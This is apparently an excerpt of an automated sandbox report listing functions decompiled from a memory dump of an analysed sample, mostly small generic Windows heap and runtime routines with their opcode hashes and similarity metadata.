                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017D3A1C(intOrPtr _a4) {
				void* _t5;

				return L017D4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                    0x017d3a35

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: 051c05d6b30895e0c87e87df87466d5d75958fe8035f39e7f55403848b57bd8c
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: 93C08C32080248BBC7126E41DC00F01BB29E7A0B60F000020B6050A9608532EC60D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BAD30 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017BAD30(intOrPtr _a4) {

				return L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                    0x017bad49

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: 9152dfa7473905128887ae851cb78da39aef19b73a01fe16f3628fef51e49143
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: 37C08C32080248BBC7126A45CD00F01BB29E7A0B60F010020B6040A6618932E860D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C76E2 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017C76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                    0x017c76e4
                                                    0x00000000
                                                    0x017c76f8
                                                    0x017c76fd

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: 178fee821cf5800b79ec779d2aa92ca4476f920ba28b5f607f6d628df4f20d98
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: E2C08C701411845AEB2E570CCE26B20BA60AB08B08F88019CAA01294A2C768E802CA08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E36CC Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017E36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                    0x017e36d2
                                                    0x017e36e8
                                                    0x017e36d4
                                                    0x017e36e5
                                                    0x017e36e5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: 7191f456373267925e056f0c73d885992452a334289006622ff1d739a4c51a73
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: F2C02B70150440FBD7151F30CD44F14F2E4F700B21F6403547222868F0D5399C00D500
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017D7D50 Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017D7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                    0x017d7d56
                                                    0x017d7d5b
                                                    0x017d7d60
                                                    0x017d7d5d
                                                    0x017d7d5d
                                                    0x017d7d5d

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: fc47662be55d5c48ebb5c91d8d320af0db99b08d2dfa36caae8156d2ce31c8ad
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: E9B092353019408FCE1ADF18C080B1573F4BB45A44B8400D4E400CBA21D229E8408900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E2ACB Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017E2ACB() {
				void* _t5;

				return E017CEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                    0x017e2adc

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: d74231fe05572739cf233b70b7389b1a61414125689464a89eb3e86e5f9e138f
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction Fuzzy Hash: CEB01232C10441CFCF02EF44C610F29B731FB00B50F0544A8900127930C728AC01CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9950 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa38363e2479034aa2ae9146643a11aa354941554363f8f136a579e7b2c28915
                                                    • Instruction ID: 27b4d86a59f5683a7e3107811c4203f860c5557e7eddad76a3ea4c147962818e
                                                    • Opcode Fuzzy Hash: fa38363e2479034aa2ae9146643a11aa354941554363f8f136a579e7b2c28915
                                                    • Instruction Fuzzy Hash: 829002A120140803D18165D94C046070005A7D1342F51C111A3058669ECAA98D557175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F99D0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d482e32f57debbc61533f10dab806cc420d6651d9dd7abc14993b5fbc34ce0e
                                                    • Instruction ID: 8cf44418ff936791691e127eb7017bedfb486f1c655a8b42cd0b2851e3f1519c
                                                    • Opcode Fuzzy Hash: 3d482e32f57debbc61533f10dab806cc420d6651d9dd7abc14993b5fbc34ce0e
                                                    • Instruction Fuzzy Hash: 5A9002A121100442D14561D948047060045A7E2341F51C112A3148668CC5A98D656165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017FB040 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8ac5d8db159066702fa016b4b10071d581987c2e9327b982280bea118d131acf
                                                    • Instruction ID: efed2596cc302d82c11c5b38473c9a457d1340e42de34e016716c8505a796375
                                                    • Opcode Fuzzy Hash: 8ac5d8db159066702fa016b4b10071d581987c2e9327b982280bea118d131acf
                                                    • Instruction Fuzzy Hash: D19002A1601144434581B1D94C044065015B7E2341391C221A1448674CC6E88959A2A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9820 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a19c1047156fd8b29428de06a8af078a7e1f4a6b127ec7ada2a68817f6fbd7a1
                                                    • Instruction ID: a70f855b59e593fc4e015e9a7db15d58cc540cd4ce23870a9b52986089a59282
                                                    • Opcode Fuzzy Hash: a19c1047156fd8b29428de06a8af078a7e1f4a6b127ec7ada2a68817f6fbd7a1
                                                    • Instruction Fuzzy Hash: 5290027124100802D18271D948046060009B7D1381F91C112A1418668EC6D58B5ABAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F98A0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ec5ec3abe21ab42f03d3a7b51b3e622a4dde8b03186cc37d03c031c235f1ff7
                                                    • Instruction ID: 53a7296c8938092a3996192a70461381a87bf7992d28e45600834ac83381f212
                                                    • Opcode Fuzzy Hash: 5ec5ec3abe21ab42f03d3a7b51b3e622a4dde8b03186cc37d03c031c235f1ff7
                                                    • Instruction Fuzzy Hash: 8490026130100802D14361D948146060009E7D2385F91C112E2418669DC6A58A57B172
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9B00 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13ba6a8f1044185d90e93139343e4c9a2d70352a48a6741356f69f30e3234ce4
                                                    • Instruction ID: 20331afa608f2d4a1f11fa7c473de8e44d0cec7e387987345e9bc894cc624fce
                                                    • Opcode Fuzzy Hash: 13ba6a8f1044185d90e93139343e4c9a2d70352a48a6741356f69f30e3234ce4
                                                    • Instruction Fuzzy Hash: 5B90026124100C02D18171D988147070006E7D1741F51C111A1018668DC6968A6976F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017FA3B0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3589274a73894ca903c82c52bd339f5c95f927f2770170368c25e1bdff4ec95
                                                    • Instruction ID: 59825b61c1e437bb9b9a5cfd56800d73ab9f7772a2b8321c3462a98f4aa2537c
                                                    • Opcode Fuzzy Hash: e3589274a73894ca903c82c52bd339f5c95f927f2770170368c25e1bdff4ec95
                                                    • Instruction Fuzzy Hash: 7890027120144402D18171D9884460B5005B7E1341F51C511E1419668CC695895AA261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9A10 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b884da8ec41a57a7fcb76700ba763d4d22243b545a6762c6d84b82e117c2fe3
                                                    • Instruction ID: 63bbf425fe7a556ad708091f0ace590d528df20bc0988d302a04942585dea232
                                                    • Opcode Fuzzy Hash: 5b884da8ec41a57a7fcb76700ba763d4d22243b545a6762c6d84b82e117c2fe3
                                                    • Instruction Fuzzy Hash: C290027120140802D14161D94C087470005A7D1342F51C111A6158669EC6E5C9957571
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9A80 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfbdefa903cce941fc7ef18abf6b27cdbd29c980fdb2a699604657d0ab34154b
                                                    • Instruction ID: 9f21532b35c7e2ba38d17b50a42280a07efc76843e5582fd9bfc06a59280076d
                                                    • Opcode Fuzzy Hash: bfbdefa903cce941fc7ef18abf6b27cdbd29c980fdb2a699604657d0ab34154b
                                                    • Instruction Fuzzy Hash: 5290026120144842D18162D94C04B0F4105A7E2342F91C119A514A668CC99589596761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9560 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55e43c02eda06fb7f8eed06eaded5e71b01cd5bf0c9194fcfbe6365e1313575d
                                                    • Instruction ID: b25a2867ccdb191ee79677fc0fcc9aaf7e67ced31bc28da75ac9d5b3fb1c2012
                                                    • Opcode Fuzzy Hash: 55e43c02eda06fb7f8eed06eaded5e71b01cd5bf0c9194fcfbe6365e1313575d
                                                    • Instruction Fuzzy Hash: E3900265221004020186A5D90A0450B0445B7D7391391C115F240A6A4CC6A189696361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017FAD30 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25f0ccee7a0046d850e4b71c59ee165b2838e57c755a3c12da030e0341ddfd8a
                                                    • Instruction ID: 96993ba15864f25c902fdea377da380a730a61ccf1d11a6c53343eacfa54a74f
                                                    • Opcode Fuzzy Hash: 25f0ccee7a0046d850e4b71c59ee165b2838e57c755a3c12da030e0341ddfd8a
                                                    • Instruction Fuzzy Hash: AA900271A0500412918171D94C146464006B7E1781B55C111A1508668CC9D48B5963E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6727f55a68a20dae942148c1e9fdc2b186b1403fac23511e688f4eb89ccd2a95
                                                    • Instruction ID: 19e27ff38bcd4a306996e07128db652a4629f8b3883c4574889eda807f5cfc82
                                                    • Opcode Fuzzy Hash: 6727f55a68a20dae942148c1e9fdc2b186b1403fac23511e688f4eb89ccd2a95
                                                    • Instruction Fuzzy Hash: E69002E1201144924541A2D98804B0A4505A7E1341B51C116E2048674CC5A58955A175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F95F0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c29601dd9b811034ba8e7a2528dfdea6f78f8bcd245d0e9faa4ea58ebbea5230
                                                    • Instruction ID: c6ecf9d13c81120b787a44b9e71723fbd2bb17f549a98b61e3786749fd39f6a5
                                                    • Opcode Fuzzy Hash: c29601dd9b811034ba8e7a2528dfdea6f78f8bcd245d0e9faa4ea58ebbea5230
                                                    • Instruction Fuzzy Hash: 3B90027120100C02D14561D94C046860005A7D1341F51C111A7018769ED6E589957171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9770 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 445a2d3a064a5ab81893af9f7d4189c341b126ee7ba806fa1bbd84bfb88b4dff
                                                    • Instruction ID: a37221f84f2dc0876abb0292362822ecadc01f9994713c373ab9641b495b6042
                                                    • Opcode Fuzzy Hash: 445a2d3a064a5ab81893af9f7d4189c341b126ee7ba806fa1bbd84bfb88b4dff
                                                    • Instruction Fuzzy Hash: 2390026120504842D14165D95808A060005A7D1345F51D111A20586A9DC6B58955B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017FA770 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f34f70f3e36a762367dc88d593b3234d7bdf5e01c29231490affd1e0af200758
                                                    • Instruction ID: 957ac6ab6717bf2aa4286e62c4e07a3f12a0cc1bf345c69a08090c68a6216a3a
                                                    • Opcode Fuzzy Hash: f34f70f3e36a762367dc88d593b3234d7bdf5e01c29231490affd1e0af200758
                                                    • Instruction Fuzzy Hash: 9890027520504842D54165D95C04A870005A7D1345F51D511A14186ACDC6D48965B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9760 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5db44e7e8e942bee00d1c05058fb6d121e6ef6eb899eaef435aa08c8dbc0b0ef
                                                    • Instruction ID: 57838238ff34561b94b9469d115b03d484c91243f137183d8943ca625cc91231
                                                    • Opcode Fuzzy Hash: 5db44e7e8e942bee00d1c05058fb6d121e6ef6eb899eaef435aa08c8dbc0b0ef
                                                    • Instruction Fuzzy Hash: 2B90027120100803D14161D959087070005A7D1341F51D511A141866CDD6D689557161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9730 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f90ad0c53587a3c34d1d2b8bc0975bbd7af4caf6770ab476e233e13e634ab927
                                                    • Instruction ID: 9dd6aec76efd04d26478cd3f87cbc380d8cce5d8cb63485e6a1e529253827931
                                                    • Opcode Fuzzy Hash: f90ad0c53587a3c34d1d2b8bc0975bbd7af4caf6770ab476e233e13e634ab927
                                                    • Instruction Fuzzy Hash: EA90026160500802D18171D958187060015A7D1341F51D111A1018668DC6D98B5976E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017FA710 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ba11fd2a49587da7da9fa382bd360b3a3ac3fdc097349f2d5cd2169e7677113
                                                    • Instruction ID: 2910ce0e91e4916f56dadba8c0cd6d193594c50cf7a288927583497afba038d1
                                                    • Opcode Fuzzy Hash: 2ba11fd2a49587da7da9fa382bd360b3a3ac3fdc097349f2d5cd2169e7677113
                                                    • Instruction Fuzzy Hash: 2B900271301004529541A6D95C04A4A4105A7F1341B51D115A5008668CC5D489656161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9650 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c289ecef04f47df4adb3bb146ec10224701f05c2b3780972bab3892b5acb63ad
                                                    • Instruction ID: 06e6aa12149d8b94b4ca79168d3ede601f7de6d72edd8327bdf0d5063b9f6142
                                                    • Opcode Fuzzy Hash: c289ecef04f47df4adb3bb146ec10224701f05c2b3780972bab3892b5acb63ad
                                                    • Instruction Fuzzy Hash: BD90027120504C42D18171D94804A460015A7D1345F51C111A10587A8DD6A58E59B6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9610 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc137c731717042984115b28b04f74e6c25f571f5c387d1fab09340ec6acaf72
                                                    • Instruction ID: 1ad6b04abf920353d9f957f1ddc65f66c690f324795b43f6c7594d6188aec81d
                                                    • Opcode Fuzzy Hash: dc137c731717042984115b28b04f74e6c25f571f5c387d1fab09340ec6acaf72
                                                    • Instruction Fuzzy Hash: 7690027160500C02D19171D948147460005A7D1341F51C111A1018768DC7D58B5976E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F96D0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc03379d322af38251d67ad4d5c50e6838d2ed435b812b8a25bf896086de8bb6
                                                    • Instruction ID: f8e45f50eab1b0957d0be45defb322e4eacdbf3e35e9a88ec3ae84743fad5015
                                                    • Opcode Fuzzy Hash: bc03379d322af38251d67ad4d5c50e6838d2ed435b812b8a25bf896086de8bb6
                                                    • Instruction Fuzzy Hash: 2E90027120100C42D14161D94804B460005A7E1341F51C116A1118768DC695C9557561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 5cdb17cc779140ae7e0192c9878fae53c3bdc3ad0732124b1fec5f231db976cc
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0184FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E0184FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E017FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01845720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01845720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










